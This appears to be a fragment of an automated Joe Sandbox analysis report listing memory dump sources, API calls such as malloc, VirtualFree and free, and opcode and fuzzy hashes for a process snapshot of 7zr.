                                 • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: malloc
                                • String ID:
                                • API String ID: 2803490479-0
                                • Opcode ID: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                • Instruction ID: a956935f7709229094ae2bf2f3a25ac460c3e3d4ccf1c0037f4c1b6be02bb11c
                                • Opcode Fuzzy Hash: 3fa4672c4b6bd134d2e796e347ec7e9f7655e2c8d42b0b7908dcec06aed2b463
                                • Instruction Fuzzy Hash: 4AA012CCE01040019D0411353801533142227F06497D4C874740041205FA14C0042002
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00AE6BAC
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                 • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-0
                                • Opcode ID: 644b1756ca6037e7ce5950e576120e6d27806d92f73ada292a441517ba704484
                                • Instruction ID: 6c7deb6a7ad9c95ea99992a6aeb6d4e0c8255dc90abc15f6ef31b54821062d59
                                • Opcode Fuzzy Hash: 644b1756ca6037e7ce5950e576120e6d27806d92f73ada292a441517ba704484
                                • Instruction Fuzzy Hash: 6EA00278680700B7ED6067306D4FF5A3B247790F05F30864472416A0D06FE47444DA5C
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                 • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                • Instruction ID: 5b366a816e283a45e11b533ddf5850b9c22f815806c3b64ba73c1d0803816e88
                                • Opcode Fuzzy Hash: e2454b01198a5d00fc32ca08fa7a2be7c10d94ad4e9c325630ada15b60d1c1ce
                                • Instruction Fuzzy Hash:
                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.1815060827.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true
                                 • Associated: 00000009.00000002.1815044082.0000000000A60000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815144599.0000000000B0C000.00000002.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815172839.0000000000B22000.00000004.00000001.01000000.0000000A.sdmp
                                 • Associated: 00000009.00000002.1815262080.0000000000B2B000.00000002.00000001.01000000.0000000A.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_a60000_7zr.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                • Instruction ID: 3e78e24d8ef97d343a515f081858a1c5a90364ae760b6875cfb17b7b8cdc9e76
                                • Opcode Fuzzy Hash: ab05dfddccdf54668762160c2768d01c6ed1f72808f71746a1287bea05698b8a
                                • Instruction Fuzzy Hash: